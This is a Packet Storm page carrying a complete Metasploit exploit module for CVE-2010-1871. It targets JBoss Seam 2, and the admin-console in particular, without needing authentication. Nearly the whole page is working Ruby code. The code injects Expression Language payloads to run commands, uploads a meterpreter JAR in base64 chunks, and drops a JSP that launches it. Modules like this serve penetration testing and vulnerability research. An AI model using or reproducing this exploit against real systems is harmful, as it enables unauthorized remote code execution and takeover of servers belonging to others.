exploit the possibilities

JBoss Seam 2 File Upload / Execute

JBoss Seam 2 File Upload / Execute
Posted Apr 3, 2015
Authored by vulp1n3 | Site metasploit.com

Versions of the JBoss Seam 2 framework prior to 2.2.1CR2 fail to properly sanitize inputs to some JBoss Expression Language expressions. As a result, attackers can gain remote code execution through the application server. This Metasploit module leverages RCE to upload and execute a meterpreter payload. Versions of the JBoss AS admin-console are known to be vulnerable to this exploit, without requiring authentication. Tested against JBoss AS 5 and 6, running on Linux with JDKs 6 and 7. This Metasploit module provides a more efficient method of exploitation - it does not loop to find desired Java classes and methods. NOTE: the check for upload success is not 100% accurate. NOTE 2: The module uploads the meterpreter JAR and a JSP to launch it.

tags | exploit, java, remote, code execution
systems | linux
advisories | CVE-2010-1871
MD5 | 81feacdab70db36a6652e5bd7a522f25

JBoss Seam 2 File Upload / Execute

Change Mirror Download
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/proto/http'
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::FileDropper


def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Seam 2 File Upload and Execute',
'Description' => %q{
Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly
sanitize inputs to some JBoss Expression Language expressions. As a
result, attackers can gain remote code execution through the
application server. This module leverages RCE to upload and execute
a meterpreter payload.

Versions of the JBoss AS admin-console are known to be vulnerable to
this exploit, without requiring authentication. Tested against
JBoss AS 5 and 6, running on Linux with JDKs 6 and 7.

This module provides a more efficient method of exploitation - it
does not loop to find desired Java classes and methods.

NOTE: the check for upload success is not 100% accurate.
NOTE 2: The module uploads the meterpreter JAR and a JSP to launch
it.

},
'Author' => [ 'vulp1n3 <vulp1n3[at]gmail.com>' ],
'References' =>
[
# JBoss EAP 4.3.0 does not properly sanitize JBoss EL inputs
['CVE', '2010-1871'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=615956'],
['URL', 'http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html'],
['URL', 'http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html']
],
'DisclosureDate' => "Aug 05 2010",
'License' => MSF_LICENSE,
'Platform' => %w{ java },
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
]
],
'DefaultTarget' => 0
))

register_options(
[
Opt::RPORT(8080),
OptString.new('AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
OptString.new('CTYPE', [ true, "Content-Type to send with requests", "application/x-www-form-urlencoded"]),
OptString.new('TARGETURI', [ true, "URI that is built on JBoss Seam 2", "/admin-console/login.seam"]),
OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 10]),
OptString.new('FNAME', [ false, "Name of file to create - NO EXTENSION! (default: random)", nil]),
OptInt.new('CHUNKSIZE', [ false, 'Size in bytes of chunk per request', 1024]),
], self.class)
end


def check
vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
vprint_debug("Server sent a 302 with location")
if (res.headers['Location'] =~ %r(public\+static\+java\.lang\.Runtime\+java.lang.Runtime.getRuntime\%28\%29))
report_vuln({
:host => rhost,
:port => rport,
:name => "#{self.name} - #{uri}",
:refs => self.references,
:info => "Module #{self.fullname} found vulnerable JBoss Seam 2 resource."
})
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Unknown
end

# If we reach this point, we didn't find the service
return Exploit::CheckCode::Unknown
end


def execute_cmd(cmd)
cmd_to_run = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('#{cmd_to_run}')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess))
vprint_status("#{rhost}:#{rport} Exploit successful")
else
vprint_status("#{rhost}:#{rport} Exploit failed.")
end
else
vprint_status("#{rhost}:#{rport} Exploit failed.")
end
end


def call_jsp(jspname)
# TODO ugly way to strip off last resource on a path
uri = target_uri.path
*keep,ignore = uri.split(/\//)
keep.push(jspname)
uri = keep.join("/")
uri = "/" + uri if (uri[0] != "/")

res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "sessionid=" + Rex::Text.rand_text_alpha(32)
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 200)
vprint_status("Successful request to JSP")
else
vprint_error("Failed to request JSP")
end
end


def upload_jsp(filename,jarname)
jsp_text = <<EOJSP
<%@ page import="java.io.*"
%><%@ page import="java.net.*"
%><%
URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("/#{jarname}")).toURI().toURL()});
Class c = cl.loadClass("metasploit.Payload");
c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
%>
EOJSP
vprint_status("Uploading JSP to launch payload")
status = upload_file_chunk(filename,'false',jsp_text)
if status
vprint_status("JSP uploaded to to #{filename}")
else
vprint_error("Failed to upload file.")
end

@pl_sent = true
end


def upload_file_chunk(filename, append='false', chunk)
# create URL-safe Base64-encoded version of chunk
b64 = Rex::Text.encode_base64(chunk)
b64 = b64.gsub("+","%2b")
b64 = b64.gsub("/","%2f")

uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
# TODO Including the conversationId part in this regex might cause
# failure on other Seam applications. Needs more testing
if (res.headers['Location'] =~ %r(user=&conversationId))
#vprint_status("#{rhost}:#{rport} Exploit successful.")
return true
else
#vprint_status("#{rhost}:#{rport} Exploit failed.")
return false
end
else
#vprint_status("#{rhost}:#{rport} Exploit failed.")
return false
end
end


def get_full_path(filename)
#vprint_debug("Trying to find full path for #{filename}")

uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
# the user argument should be set to the result of our call - which
# will be the full path of our file
matches = /.*user=(.+)\&.*/.match(res.headers['Location'])
#vprint_debug("Location is " + res.headers['Location'])
if (matches and matches.captures)
return Rex::Text::uri_decode(matches.captures[0])
else
return nil
end
else
return nil
end
end


def java_stager(fname, chunk_size)
@payload_exe = fname + ".jar"
jsp_name = fname + ".jsp"

#data = payload.encoded_jar.pack
data = payload.encoded_jar.pack

append = 'false'
while (data.length > chunk_size)
status = upload_file_chunk(@payload_exe, append, data[0, chunk_size])
if status
vprint_debug("Uploaded chunk")
else
vprint_error("Failed to upload chunk")
break
end
data = data[chunk_size, data.length - chunk_size]
# first chunk is an overwrite, afterwards, we need to append
append = 'true'
end
status = upload_file_chunk(@payload_exe, 'true', data)
if status
vprint_status("Payload uploaded to " + @payload_exe)
else
vprint_error("Failed to upload file.")
end

# write a JSP that can call the payload in the jar
upload_jsp(jsp_name, @payload_exe)

pe_path = get_full_path(@payload_exe) || @payload_exe
jsp_path = get_full_path(jsp_name) || jsp_name
# try to clean up our stuff;
register_files_for_cleanup(pe_path, jsp_path)

# call the JSP to launch the payload
call_jsp(jsp_name)
end

def exploit
@pl_sent = false

if check == Exploit::CheckCode::Vulnerable

fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(8+rand(8))

vprint_status("#{rhost}:#{rport} Host is vulnerable")
vprint_status("#{rhost}:#{rport} Uploading file...")

# chunking code based on struts_code_exec_exception_delegator
append = 'false'
chunk_size = datastore['CHUNKSIZE']
# sanity check
if (chunk_size <= 0)
vprint_error("Invalid chunk size #{chunk_size}")
return
end

vprint_debug("Sending in chunks of #{chunk_size}")

case target['Platform']
when 'java'
java_stager(fname, chunk_size)
else
fail_with(Failure::NoTarget, 'Unsupported target platform!')
end

handler
end
end
end

Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close